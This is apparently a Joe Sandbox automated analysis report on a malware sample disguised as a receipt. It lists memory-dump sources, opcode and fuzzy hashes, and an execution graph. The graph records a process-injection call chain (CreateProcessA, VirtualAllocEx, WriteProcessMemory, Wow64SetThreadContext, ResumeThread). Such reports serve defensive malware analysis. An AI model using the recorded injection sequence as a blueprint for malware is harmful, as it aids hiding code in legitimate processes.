                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4100649557.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_114d000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5f1874c587b76be5dc2fbb2cfbec0d60a8076a00d2280d8e12a26aef75442500
                                                                  • Instruction ID: 19767d0eea6c44a13c884c56f583b23fddafa4f4b3c2873598f679c622abab5a
                                                                  • Opcode Fuzzy Hash: 5f1874c587b76be5dc2fbb2cfbec0d60a8076a00d2280d8e12a26aef75442500
                                                                  • Instruction Fuzzy Hash: 902107B5608204DFDF09DF58E5C4B25BBA5FB94724F24C56DE80A4B342C336D806CB62
                                                                  Function 0114D0FC Relevance: .1, Instructions: 72COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4100649557.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_114d000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c6b393682a12240aea740cd8d8b94d3c027d85ccd96ff05eee353b639c61f95b
                                                                  • Instruction ID: 7dcfd65eced0c5145ed1552e4b48e25ea47910e10fb4045ac12492442a265869
                                                                  • Opcode Fuzzy Hash: c6b393682a12240aea740cd8d8b94d3c027d85ccd96ff05eee353b639c61f95b
                                                                  • Instruction Fuzzy Hash: 1421F5B56042049FDF09DF58E9C4B26BBA5FB98B14F24C96DDC0A4B352C336D846CB62
                                                                  Function 0114D01C Relevance: .1, Instructions: 71COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4100649557.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_114d000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1c2c551a29f0eb761936b2a67d8abd7a4b3458ac565fe3e6b31e787eeffc58a2
                                                                  • Instruction ID: 864212ce678047269c1a580803176e253c1efeca85808201bc3e6c3bf198778b
                                                                  • Opcode Fuzzy Hash: 1c2c551a29f0eb761936b2a67d8abd7a4b3458ac565fe3e6b31e787eeffc58a2
                                                                  • Instruction Fuzzy Hash: A821D071604300DFDF19DF68E984B26BBA5EBA4B54F20C66DD90A4B352C336D846C662
                                                                  Function 0114D006 Relevance: .1, Instructions: 62COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4100649557.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_114d000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d0890deff214d42c8c5aa1187cdecc14d2ba6b0038d87376efc1a1ecf4851114
                                                                  • Instruction ID: 9d1beb7bd732891a2c282aaeb28a2a4cf559f73e4b515bffe8118933f1342a33
                                                                  • Opcode Fuzzy Hash: d0890deff214d42c8c5aa1187cdecc14d2ba6b0038d87376efc1a1ecf4851114
                                                                  • Instruction Fuzzy Hash: 9A21D4715083808FCB07CF24D984711BF71EB56614F24C1EAD8498B2A3C33A9846C762
                                                                  Function 0113D423 Relevance: .1, Instructions: 56COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4100514357.000000000113D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0113D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_113d000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                  • Instruction ID: 347e738bf76819cfaa29082a12ad5be229d213a6b12cfa705a73e19080fc343e
                                                                  • Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                  • Instruction Fuzzy Hash: 7B11CD76504280DFDF16CF54E5C4B56BF72FB84224F24C5A9D8090B65AC336D45ACBA1
                                                                  Function 0114D0F7 Relevance: .1, Instructions: 53COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4100649557.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_114d000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                  • Instruction ID: dfbab088f33d953a9f7569ab8d8bd8003a6e8602cb04fe3cfd12f8df0d8ccc4b
                                                                  • Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                  • Instruction Fuzzy Hash: 3411BE75504240CFDF06CF54D9C4B15BBB1FB44A24F24C6A9DC094B256C33AD44ACB51
                                                                  Function 0114D2AF Relevance: .1, Instructions: 53COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4100649557.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_114d000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                  • Instruction ID: afecc02ece3c17f332c3db816a1c6fa470af7c2f4823b143948815e5b98065fd
                                                                  • Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                  • Instruction Fuzzy Hash: 1911BEB5508240CFDF16CF54D5C4B15BBA1FB44614F24C6A9D8494B252C33AD40ACB51

                                                                  Execution Graph

                                                                  Execution Coverage:10.7%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:197
                                                                  Total number of Limit Nodes:7
                                                                  execution_graph 51466 76562f0 51470 7657741 51466->51470 51474 7657750 51466->51474 51467 76562ff 51471 7657750 51470->51471 51478 7657794 51471->51478 51475 7657765 51474->51475 51477 7657794 12 API calls 51475->51477 51476 7657777 51476->51467 51477->51476 51479 76577aa 51478->51479 51502 7658248 51479->51502 51507 7657e09 51479->51507 51512 765814e 51479->51512 51517 76580ae 51479->51517 51523 7657eac 51479->51523 51528 7657e42 51479->51528 51533 7657d02 51479->51533 51538 7658060 51479->51538 51542 7657e9a 51479->51542 51550 7657c9a 51479->51550 51559 765813b 51479->51559 51564 76581d9 51479->51564 51571 76580be 51479->51571 51576 7657d3c 51479->51576 51581 76585d0 51479->51581 51586 7657dd0 51479->51586 51591 7658217 51479->51591 51596 7658637 51479->51596 51601 7657f37 51479->51601 51606 7657df5 51479->51606 51611 7657c0a 51479->51611 51480 7657777 51480->51467 51503 7657e59 51502->51503 51504 7657e7a 51502->51504 51620 7655af0 51503->51620 51624 7655ae8 51503->51624 51508 7657d3d 51507->51508 51628 7655470 51508->51628 51632 7655468 51508->51632 51509 765860b 51513 7657d0b 51512->51513 51636 7655be0 51513->51636 51640 7655bd9 51513->51640 51514 76586b8 51519 7657f52 51517->51519 51518 7658377 51518->51480 51519->51518 51644 7655a30 51519->51644 51648 7655a28 51519->51648 51520 76582dc 51524 7657eb1 51523->51524 51525 765800d 51524->51525 51652 7655520 51524->51652 51656 7655519 51524->51656 51525->51480 51529 7657e48 51528->51529 51531 7655af0 WriteProcessMemory 51529->51531 51532 7655ae8 WriteProcessMemory 51529->51532 51530 7657e7a 51531->51530 51532->51530 51534 7657d0b 51533->51534 51536 7655be0 ReadProcessMemory 51534->51536 51537 7655bd9 ReadProcessMemory 51534->51537 51535 76586b8 51536->51535 51537->51535 51540 7655af0 WriteProcessMemory 51538->51540 51541 7655ae8 WriteProcessMemory 51538->51541 51539 765808e 51539->51480 51540->51539 51541->51539 51543 76581dd 51542->51543 51544 7657d0b 51543->51544 51546 7655520 Wow64SetThreadContext 51543->51546 51547 7655519 Wow64SetThreadContext 51543->51547 51548 7655be0 ReadProcessMemory 51544->51548 51549 7655bd9 ReadProcessMemory 51544->51549 51545 76586b8 51546->51544 51547->51544 51548->51545 51549->51545 51551 7657c0b 51550->51551 51660 7655d6c 51551->51660 51664 7655d78 51551->51664 51552 7658477 51552->51480 51553 7657ce3 51553->51552 51557 7655be0 ReadProcessMemory 51553->51557 51558 7655bd9 ReadProcessMemory 51553->51558 51554 76586b8 51557->51554 51558->51554 51560 7657f52 51559->51560 51562 7655a30 VirtualAllocEx 51560->51562 51563 7655a28 VirtualAllocEx 51560->51563 51561 76582dc 51562->51561 51563->51561 51567 7655520 Wow64SetThreadContext 51564->51567 51568 7655519 Wow64SetThreadContext 51564->51568 51565 7657d0b 51569 7655be0 ReadProcessMemory 51565->51569 51570 7655bd9 ReadProcessMemory 51565->51570 51566 76586b8 51567->51565 51568->51565 51569->51566 51570->51566 51572 765805f 51571->51572 51573 765808e 51572->51573 51574 7655af0 WriteProcessMemory 51572->51574 51575 7655ae8 WriteProcessMemory 51572->51575 51573->51480 51574->51573 51575->51573 51577 7657d4a 51576->51577 51579 7655470 ResumeThread 51577->51579 51580 7655468 ResumeThread 51577->51580 51578 765860b 51579->51578 51580->51578 51582 76585df 51581->51582 51584 7655470 ResumeThread 51582->51584 51585 7655468 ResumeThread 51582->51585 51583 765860b 51584->51583 51585->51583 51587 7657ddd 51586->51587 51589 7655af0 WriteProcessMemory 51587->51589 51590 7655ae8 WriteProcessMemory 51587->51590 51588 7657d97 51588->51480 51589->51588 51590->51588 51592 7657d0b 51591->51592 51594 7655be0 ReadProcessMemory 51592->51594 51595 7655bd9 ReadProcessMemory 51592->51595 51593 76586b8 51594->51593 51595->51593 51598 7657d0b 51596->51598 51597 76586b8 51598->51596 51599 7655be0 ReadProcessMemory 51598->51599 51600 7655bd9 ReadProcessMemory 51598->51600 51599->51597 51600->51597 51602 7657f3d 51601->51602 51604 7655a30 VirtualAllocEx 51602->51604 51605 7655a28 VirtualAllocEx 51602->51605 51603 76582dc 51604->51603 51605->51603 51607 7657e02 51606->51607 51609 7655470 ResumeThread 51607->51609 51610 7655468 ResumeThread 51607->51610 51608 765860b 51609->51608 51610->51608 51612 7657c15 51611->51612 51618 7655d6c CreateProcessA 51612->51618 51619 7655d78 CreateProcessA 51612->51619 51613 7658477 51613->51480 51614 7657ce3 51614->51613 51616 7655be0 ReadProcessMemory 51614->51616 51617 7655bd9 ReadProcessMemory 51614->51617 51615 76586b8 51616->51615 51617->51615 51618->51614 51619->51614 51621 7655b38 WriteProcessMemory 51620->51621 51623 7655b8f 51621->51623 51623->51504 51625 7655af0 WriteProcessMemory 51624->51625 51627 7655b8f 51625->51627 51627->51504 51629 76554b0 ResumeThread 51628->51629 51631 76554e1 51629->51631 51631->51509 51633 7655470 ResumeThread 51632->51633 51635 76554e1 51633->51635 51635->51509 51637 7655c2b ReadProcessMemory 51636->51637 51639 7655c6f 51637->51639 51639->51514 51641 7655c2b ReadProcessMemory 51640->51641 51643 7655c6f 51641->51643 51643->51514 51645 7655a70 VirtualAllocEx 51644->51645 51647 7655aad 51645->51647 51647->51520 51649 7655a70 VirtualAllocEx 51648->51649 51651 7655aad 51649->51651 51651->51520 51653 7655565 Wow64SetThreadContext 51652->51653 51655 76555ad 51653->51655 51655->51525 51657 7655565 Wow64SetThreadContext 51656->51657 51659 76555ad 51657->51659 51659->51525 51661 7655d78 CreateProcessA 51660->51661 51663 7655fc3 51661->51663 51665 7655e01 CreateProcessA 51664->51665 51667 7655fc3 51665->51667 51667->51667 51677 135d580 51678 135d5c6 51677->51678 51682 135d760 51678->51682 51685 135d74f 51678->51685 51679 135d6b3 51688 135d090 51682->51688 51686 135d78e 51685->51686 51687 135d090 DuplicateHandle 51685->51687 51686->51679 51687->51686 51689 135d7c8 DuplicateHandle 51688->51689 51690 135d78e 51689->51690 51690->51679 51668 135b218 51671 135b300 51668->51671 51669 135b227 51672 135b2b5 51671->51672 51676 135b30a 51671->51676 51672->51669 51673 135b344 51673->51669 51674 135b548 GetModuleHandleW 51675 135b575 51674->51675 51675->51669 51676->51673 51676->51674 51691 76589d8 51692 7658b63 51691->51692 51694 76589fe 51691->51694 51694->51692 51695 7654188 51694->51695 51696 7658c58 PostMessageW 51695->51696 51697 7658cc4 51696->51697 51697->51694 51698 1354668 51699 135467a 51698->51699 51703 13546b8 51699->51703 51708 1354778 51699->51708 51700 1354686 51705 13546c2 51703->51705 51713 1354878 51705->51713 51717 1354888 51705->51717 51709 135479d 51708->51709 51711 1354878 CreateActCtxA 51709->51711 51712 1354888 CreateActCtxA 51709->51712 51710 13547a7 51710->51700 51711->51710 51712->51710 51715 13548af 51713->51715 51714 135498c 51714->51714 51715->51714 51721 13544b4 51715->51721 51719 13548af 51717->51719 51718 135498c 51718->51718 51719->51718 51720 13544b4 CreateActCtxA 51719->51720 51720->51718 51722 1355918 CreateActCtxA 51721->51722 51724 13559db 51722->51724

                                                                  Executed Functions

                                                                  Function 08CF3668 Relevance: 7.0, Strings: 5, Instructions: 721COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (odq$(odq$,hq$,hq$Hhq
                                                                  • API String ID: 0-2569284993
                                                                  • Opcode ID: 4959805311feb9b874b25c8e089f3c9faacc7478e2ad9c8a18ce9992cc655c45
                                                                  • Instruction ID: 7e2188d012f6c265e64ddab08ff1e7cd9e8edd7c5b1846f57a0952eef8802fcc
                                                                  • Opcode Fuzzy Hash: 4959805311feb9b874b25c8e089f3c9faacc7478e2ad9c8a18ce9992cc655c45
                                                                  • Instruction Fuzzy Hash: C3527F34B00255EFDB54DF79C484A6EBBB2BF88711F158169E9069B3A2CB31DD42CB90
                                                                  Function 08CF1240 Relevance: 1.9, Strings: 1, Instructions: 649COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 983 8cf1240-8cf1271 984 8cf1278-8cf133d 983->984 985 8cf1273 983->985 991 8cf138b-8cf139c 984->991 985->984 992 8cf133f-8cf1377 991->992 993 8cf139e-8cf1406 991->993 996 8cf137e-8cf1388 992->996 997 8cf1379 992->997 1001 8cf1c60-8cf1c8b 993->1001 996->991 997->996 1003 8cf1c8d-8cf1cb6 1001->1003 1004 8cf1cb8-8cf1cba 1001->1004 1005 8cf1cc0-8cf1cd4 1003->1005 1004->1005 1007 8cf140b-8cf1412 1005->1007 1008 8cf1cda-8cf1ce1 1005->1008 1009 8cf1464-8cf149f 1007->1009 1011 8cf14a5-8cf14ae 1009->1011 1012 8cf1414-8cf142a 1009->1012 1015 8cf14b1-8cf14e5 1011->1015 1013 8cf142c 1012->1013 1014 8cf1431-8cf144f 1012->1014 1013->1014 1016 8cf1456-8cf1461 1014->1016 1017 8cf1451 1014->1017 1019 8cf14e7-8cf1501 1015->1019 1020 8cf1504-8cf152b 1015->1020 1016->1009 1017->1016 1019->1020 1023 8cf152d-8cf1556 1020->1023 1024 8cf1558 1020->1024 1025 8cf1562-8cf1570 1023->1025 1024->1025 1027 8cf1576-8cf157d 1025->1027 1028 8cf1660-8cf170d 1025->1028 1029 8cf1643-8cf1654 1027->1029 1052 8cf170f 1028->1052 1053 8cf1713-8cf1715 1028->1053 1030 8cf165a-8cf165b 1029->1030 1031 8cf1582-8cf1598 1029->1031 1033 8cf1c07-8cf1c42 1030->1033 1034 8cf159f-8cf15fd 1031->1034 1035 8cf159a 1031->1035 1033->1015 1040 8cf1c48-8cf1c5f 1033->1040 1045 8cf15ff 1034->1045 1046 8cf1604-8cf1629 1034->1046 1035->1034 1040->1001 1045->1046 1050 8cf163f-8cf1640 1046->1050 1051 8cf162b-8cf1637 1046->1051 1050->1029 1051->1050 1055 8cf1717 1052->1055 1056 8cf1711 1052->1056 1054 8cf171c-8cf1723 1053->1054 1057 8cf1725-8cf172e 1054->1057 1058 8cf1731-8cf1762 1054->1058 1055->1054 1056->1053 1057->1058 1060 8cf17b5-8cf17f0 1058->1060 1062 8cf17f6-8cf1809 1060->1062 1063 8cf1764-8cf1779 1060->1063 1067 8cf180b-8cf19b2 1062->1067 1068 8cf1811-8cf1831 1062->1068 1065 8cf177b 1063->1065 1066 8cf1780-8cf179e 1063->1066 1065->1066 1069 8cf17a5-8cf17b2 1066->1069 1070 8cf17a0 1066->1070 1073 8cf19ba-8cf1a59 1067->1073 1074 8cf19b4-8cf19b5 1067->1074 1076 8cf183a-8cf18fd 1068->1076 1069->1060 1070->1069 1094 8cf1a5b 1073->1094 1095 8cf1a60-8cf1a92 1073->1095 1075 8cf1bc2-8cf1bef 1074->1075 1079 8cf1c06 1075->1079 1080 8cf1bf1-8cf1c05 1075->1080 1092 8cf18ff 1076->1092 1093 8cf1904-8cf1917 1076->1093 1079->1033 1080->1079 1092->1093 1096 8cf191e-8cf192b 1093->1096 1097 8cf1919 1093->1097 1094->1095 1101 8cf1a99-8cf1acb 1095->1101 1102 8cf1a94 1095->1102 1098 8cf192d 1096->1098 1099 8cf1932-8cf1956 1096->1099 1097->1096 1098->1099 1105 8cf195d-8cf1977 1099->1105 1106 8cf1958 1099->1106 1109 8cf1acd 1101->1109 1110 8cf1ad2-8cf1b2f 1101->1110 1102->1101 1107 8cf1979-8cf1998 1105->1107 1108 8cf19a2-8cf19a3 1105->1108 1106->1105 1111 8cf199f 1107->1111 1112 8cf199a 1107->1112 1108->1075 1109->1110 1115 8cf1b81-8cf1ba3 1110->1115 1116 8cf1b31-8cf1b7b 1110->1116 1111->1108 1112->1111 1119 8cf1bad-8cf1bc0 1115->1119 1116->1115 1119->1075
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: d
                                                                  • API String ID: 0-2564639436
                                                                  • Opcode ID: d20d19022ce96cb71e96335f27f9054e55ea566be166f83b6a81ceb88dbde173
                                                                  • Instruction ID: f4bd773d9e94a346fd880a268a81539d03ac3d13fece848eab392ad0489d340f
                                                                  • Opcode Fuzzy Hash: d20d19022ce96cb71e96335f27f9054e55ea566be166f83b6a81ceb88dbde173
                                                                  • Instruction Fuzzy Hash: 7562DF74E01228CFDB65DF69C984BEEBBB2BB49301F1481EAD409A7255DB309E85CF50
                                                                  Function 056376A8 Relevance: 1.8, Instructions: 1830COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1122 56376a8-56376d3 1123 56376d5 1122->1123 1124 56376da-5637c24 call 563735c call 563736c call 563737c call 563736c call 563737c call 563738c call 563737c call 563738c call 563739c call 563736c call 563737c call 56373ac call 563737c call 56373bc * 3 call 56373cc call 56373dc call 56373ec call 56373fc 1122->1124 1123->1124 1211 5637c26-5637c32 1124->1211 1212 5637c4e 1124->1212 1213 5637c34-5637c3a 1211->1213 1214 5637c3c-5637c42 1211->1214 1215 5637c54-5637ff8 call 563740c call 56373cc call 56373dc call 56373ec call 563741c call 563742c call 563743c call 563744c call 563745c call 56373cc call 56373dc call 56373ec call 56373fc 1212->1215 1217 5637c4c 1213->1217 1214->1217 1258 5638022 1215->1258 1259 5637ffa-5638006 1215->1259 1217->1215 1262 5638028-5638285 call 563740c call 56373cc call 56373dc call 56373ec call 563741c call 563742c call 563743c call 56373cc call 56373dc 1258->1262 1260 5638010-5638016 1259->1260 1261 5638008-563800e 1259->1261 1263 5638020 1260->1263 1261->1263 1531 5638288 call 8cf1240 1262->1531 1532 5638288 call 8cf1230 1262->1532 1263->1262 1291 563828e-5638334 1533 563833a call 8cf29c8 1291->1533 1534 563833a call 8cf29b8 1291->1534 1298 5638340-5638374 1301 5638376 1298->1301 1302 563837b-5638b17 call 56373ec call 56373fc call 563744c call 563746c call 56373cc call 56373dc call 56373ec call 56373fc call 563747c call 56373cc call 56373dc call 56373ec call 56373fc call 563746c call 56373cc call 56373dc call 56373ec call 56373fc call 563745c call 56373cc call 56373dc call 56373ec call 56373fc call 563748c call 563744c 1298->1302 1301->1302 1384 5638b41 1302->1384 1385 5638b19-5638b25 1302->1385 1386 5638b47-5639392 call 563740c call 56373cc call 56373dc call 56373ec call 563741c call 563742c call 563743c call 563745c call 56373cc call 56373dc call 56373ec call 56373fc call 56373cc call 56373dc call 56373ec call 56373fc call 563748c call 563749c call 563745c call 56373cc call 56373dc call 56373ec call 56373fc call 563744c call 56374ac call 56374bc call 56374cc call 56373bc * 6 1384->1386 1387 5638b27-5638b2d 1385->1387 1388 5638b2f-5638b35 1385->1388 1535 5639395 call 8cfa348 1386->1535 1536 5639395 call 8cfa338 1386->1536 1390 5638b3f 1387->1390 1388->1390 1390->1386 1491 5639398-56395da call 56373bc * 4 call 563745c call 56374dc call 56374ec call 56373dc call 56374fc call 563750c call 563751c * 2 1530 56395df-56395e7 1491->1530 1531->1291 1532->1291 1533->1298 1534->1298 1535->1491 1536->1491
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 11a2ad75112a1ed85c2948ed0e4b287c5ee2689b795ce9d238b4c8504e4ced7c
                                                                  • Instruction ID: f8caa1777f0d19d4a0f9565f9308594926bd69ec93ca04d5262686cf2a1349d9
                                                                  • Opcode Fuzzy Hash: 11a2ad75112a1ed85c2948ed0e4b287c5ee2689b795ce9d238b4c8504e4ced7c
                                                                  • Instruction Fuzzy Hash: CA13C874A11219CFDB25DF64C898B99B7B1FF89300F1182E9E8096B361DB71AE85CF44
                                                                  Function 05637699 Relevance: 1.8, Instructions: 1823COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1537 5637699-56376d3 1539 56376d5 1537->1539 1540 56376da-563778b call 563735c call 563736c 1537->1540 1539->1540 1553 5637795-56377a1 call 563737c 1540->1553 1555 56377a6-56378b7 call 563736c call 563737c call 563738c call 563737c call 563738c 1553->1555 1577 56378c1-56378cd call 563739c 1555->1577 1579 56378d2-5637a20 call 563736c call 563737c call 56373ac call 563737c 1577->1579 1602 5637a2b-5637a3e 1579->1602 1603 5637a44-5637a53 call 56373bc 1602->1603 1605 5637a58-5637a6c 1603->1605 1606 5637a72-5637a81 call 56373bc 1605->1606 1608 5637a86-5637a9a 1606->1608 1609 5637aa0-5637bba call 56373bc call 56373cc call 56373dc 1608->1609 1621 5637bc4-5637bd8 call 56373ec 1609->1621 1623 5637bdd-5637c24 call 56373fc 1621->1623 1627 5637c26-5637c32 1623->1627 1628 5637c4e 1623->1628 1629 5637c34-5637c3a 1627->1629 1630 5637c3c-5637c42 1627->1630 1631 5637c54-5637cf5 call 563740c call 56373cc call 56373dc 1628->1631 1633 5637c4c 1629->1633 1630->1633 1640 5637cff-5637d19 call 56373ec 1631->1640 1633->1631 1642 5637d1e-5637dae call 563741c call 563742c call 563743c call 563744c 1640->1642 1652 5637db3-5637dc7 1642->1652 1653 5637dcd-5637e0e call 563745c 1652->1653 1656 5637e13-5637e21 1653->1656 1657 5637e27-5637ff8 call 56373cc call 56373dc call 56373ec call 56373fc 1656->1657 1674 5638022 1657->1674 1675 5637ffa-5638006 1657->1675 1678 5638028-563818b call 563740c call 56373cc call 56373dc call 56373ec call 563741c call 563742c call 563743c 1674->1678 1676 5638010-5638016 1675->1676 1677 5638008-563800e 1675->1677 1679 5638020 1676->1679 1677->1679 1697 5638196-56381b0 call 56373cc 1678->1697 1679->1678 1699 56381b5-5638239 call 56373dc 1697->1699 1703 563823e 1699->1703 1704 5638245-5638264 1703->1704 1706 563826f-5638285 1704->1706 1947 5638288 call 8cf1240 1706->1947 1948 5638288 call 8cf1230 1706->1948 1707 563828e-56382e3 1711 56382ed-56382fe 1707->1711 1712 5638305-5638317 1711->1712 1713 5638322-5638334 1712->1713 1949 563833a call 8cf29c8 1713->1949 1950 563833a call 8cf29b8 1713->1950 1714 5638340-563834c 1715 5638356-563835e 1714->1715 1716 5638364-5638374 1715->1716 1717 5638376 1716->1717 1718 563837b-5638460 call 56373ec call 56373fc call 563744c 1716->1718 1717->1718 1729 5638465-5638479 call 563746c 1718->1729 1731 563847e-5638b17 call 56373cc call 56373dc call 56373ec call 56373fc call 563747c call 56373cc call 56373dc call 56373ec call 56373fc call 563746c call 56373cc call 56373dc call 56373ec call 56373fc call 563745c call 56373cc call 56373dc call 56373ec call 56373fc call 563748c call 563744c 1729->1731 1800 5638b41 1731->1800 1801 5638b19-5638b25 1731->1801 1802 5638b47-563923a call 563740c call 56373cc call 56373dc call 56373ec call 563741c call 563742c call 563743c call 563745c call 56373cc call 56373dc call 56373ec call 56373fc call 56373cc call 56373dc call 56373ec call 56373fc call 563748c call 563749c call 563745c call 56373cc call 56373dc call 56373ec call 56373fc call 563744c call 56374ac 1800->1802 1803 5638b27-5638b2d 1801->1803 1804 5638b2f-5638b35 1801->1804 1884 563923f-563924b call 56374bc 1802->1884 1806 5638b3f 1803->1806 1804->1806 1806->1802 1886 5639250-5639373 call 56374cc call 56373bc * 6 1884->1886 1906 5639378-5639392 1886->1906 1951 5639395 call 8cfa348 1906->1951 1952 5639395 call 8cfa338 1906->1952 1907 5639398-5639477 call 56373bc * 4 call 563745c 1922 563947c-563948a 1907->1922 1923 5639490-56394ff call 56374dc call 56374ec call 56373dc 1922->1923 1930 5639504-5639510 call 56374fc 1923->1930 1932 5639515-563955d call 563750c 1930->1932 1937 5639562-5639587 call 563751c 1932->1937 1940 563958c-56395b9 1937->1940 1943 56395c5-56395da call 563751c 1940->1943 1946 56395df-56395e7 1943->1946 1947->1707 1948->1707 1949->1714 1950->1714 1951->1907 1952->1907
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 75321dbc74978b8e52d816d763a19d44cd5e1a4d5efe12f365c53be6e0379b37
                                                                  • Instruction ID: bd2d32b6b908a7bbeace79ba77325916870e4d4a32d514dcddb8fad2a4fa2646
                                                                  • Opcode Fuzzy Hash: 75321dbc74978b8e52d816d763a19d44cd5e1a4d5efe12f365c53be6e0379b37
                                                                  • Instruction Fuzzy Hash: A713C874A11219CFDB15DF64C898B99B7B1FF89300F2182E9E8096B361DB71AE85CF44
                                                                  Function 073C6C81 Relevance: 5.3, Strings: 4, Instructions: 343COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
